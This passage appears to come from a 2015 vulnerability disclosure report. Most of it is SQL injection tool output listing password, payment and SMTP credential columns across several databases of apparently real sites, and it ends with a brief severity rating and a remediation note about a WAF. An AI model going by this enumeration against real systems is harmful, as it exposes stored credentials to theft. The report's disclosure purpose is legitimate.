Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: cqrhyEnglishTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: cqrhyEnglishTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: cqrhyEnglishTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: cqrhyEnglishTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: qmkgbTable: blog_Member[1 column]+--------------+----------+| Column | Type |+--------------+----------+| mem_Password | nvarchar |+--------------+----------+Database: yideng_dataTable: CB_Admin[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | nvarchar |+----------+----------+Database: yideng_dataTable: CB_Discount[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | nvarchar |+----------+----------+Database: yideng_dataTable: CB_Smtp[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | nvarchar |+----------+----------+Database: yideng_dataTable: CB_Member[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | nvarchar |+----------+----------+Database: yrwTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: yrwTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: yrwTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: yrwTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: yrwTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: yrwTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: yrwTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: yrwTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+
上WAF。
危害等级:中
漏洞Rank:5
确认时间:2015-11-20 15:27
Referred to related parties.
暂无